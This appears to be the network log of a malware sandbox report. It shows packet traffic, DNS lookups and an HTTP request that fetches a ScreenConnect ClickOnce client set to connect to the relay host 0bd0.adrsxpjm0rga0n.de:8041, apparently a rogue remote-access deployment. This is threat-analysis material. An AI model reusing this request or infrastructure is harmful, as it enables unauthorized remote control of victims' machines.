                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.095763922 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.095779896 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.095813036 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.151905060 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.151973963 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.152008057 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.152017117 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.152044058 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.152057886 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.299601078 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.299695015 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.299702883 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.299729109 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.299756050 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.299770117 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.348038912 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.348109961 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.348159075 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.348171949 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.348203897 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.348218918 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.376554966 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.376622915 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.376657009 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.376663923 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.376705885 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.408323050 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.408381939 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.408531904 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.408540964 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.409662962 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.495637894 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.495727062 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.495731115 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.495759964 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.495781898 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.495922089 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.516081095 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.516144991 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.516168118 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.516176939 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.516207933 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.516216993 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.536518097 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.536592007 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.536602020 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.536624908 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.536647081 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.536669016 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.549180984 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.549235106 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.549273968 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.549279928 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.549431086 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.549431086 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.561264992 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.561311007 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.561336994 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.561348915 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.561494112 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.561494112 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.672141075 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.672211885 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.672354937 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.672354937 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.672363043 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.674006939 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.683662891 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.683728933 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.683765888 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.683774948 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.683924913 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.683924913 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695699930 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695744991 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695780993 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695795059 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695828915 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.695847988 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.706362009 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.706422091 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.706446886 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.706454992 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.706492901 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718708992 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718758106 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718786955 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718796968 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718821049 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.718848944 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.730319023 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.730366945 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.730407000 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.730413914 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.730453014 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742358923 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742429018 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742456913 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742464066 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742621899 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.742621899 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.754775047 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.754828930 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.754859924 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.754872084 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.755022049 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.755022049 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.867722988 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.867786884 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.867824078 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.867831945 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.867985964 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877157927 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877206087 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877238989 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877245903 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877265930 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.877284050 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.886131048 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.886177063 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.886217117 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.886224985 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.886266947 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894042015 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894087076 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894120932 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894128084 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894150972 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.894165039 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902677059 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902723074 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902746916 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902753115 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902776957 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.902795076 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.911463976 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.911525011 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.911556959 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.911562920 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.911608934 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.919951916 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.920006037 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.920031071 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.920038939 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.920059919 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.920080900 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.928963900 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.929004908 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.929028034 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.929033995 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.929060936 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:40.929076910 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059209108 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059268951 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059286118 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059309006 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059325933 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.059345007 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.066610098 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.066657066 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.066725016 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.066756964 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.066776991 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.066803932 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.073518038 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.073565006 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.073594093 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.073601961 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.073637962 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.073657036 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.081351995 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.081399918 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.081412077 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.081442118 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.081474066 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.081474066 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.089080095 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.089127064 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.089142084 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.089152098 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.089181900 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.089195967 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.096350908 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.096395016 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.096412897 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.096422911 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.096450090 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.096458912 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.099859953 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.099925041 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.099931955 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.100076914 CET44349764104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.100126028 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:41.100265026 CET49764443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:45.500734091 CET497668041192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:45.620845079 CET804149766104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:45.621066093 CET497668041192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:46.215554953 CET497668041192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:46.335841894 CET804149766104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:46.841800928 CET804149766104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:46.858625889 CET497668041192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:46.978477001 CET804149766104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:47.240567923 CET804149766104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:47.295892954 CET497668041192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:48:17.264725924 CET497668041192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:48:17.400710106 CET804149766104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:48:17.657300949 CET804149766104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:48:17.702147961 CET497668041192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:48:47.671014071 CET497668041192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:48:47.791080952 CET804149766104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:48:48.049310923 CET804149766104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:48:48.092850924 CET497668041192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Dec 22, 2024 12:46:58.798923016 CET5931053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                Dec 22, 2024 12:46:59.415908098 CET53593101.1.1.1192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:45.085733891 CET6099153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:45.469410896 CET53609911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Dec 22, 2024 12:46:58.798923016 CET192.168.2.41.1.1.10x2233Standard query (0)crea.alarmasdelsureste.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:45.085733891 CET192.168.2.41.1.1.10x6b27Standard query (0)0bd0.adrsxpjm0rga0n.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Dec 22, 2024 12:46:59.415908098 CET1.1.1.1192.168.2.40x2233No error (0)crea.alarmasdelsureste.com104.168.134.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.825383902 CET1.1.1.1192.168.2.40x4438No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:02.825383902 CET1.1.1.1192.168.2.40x4438No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:04.224158049 CET1.1.1.1192.168.2.40xf193No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:04.224158049 CET1.1.1.1192.168.2.40xf193No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.890259981 CET1.1.1.1192.168.2.40xe0eaNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.890259981 CET1.1.1.1192.168.2.40xe0eaNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:45.469410896 CET1.1.1.1192.168.2.40x6b27No error (0)0bd0.adrsxpjm0rga0n.de104.168.134.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                • crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.449731104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:01 UTC661OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                2024-12-22 11:47:02 UTC250INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 117905
                                                                                                                                                                                                                                                Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:02 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:02 UTC16134INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
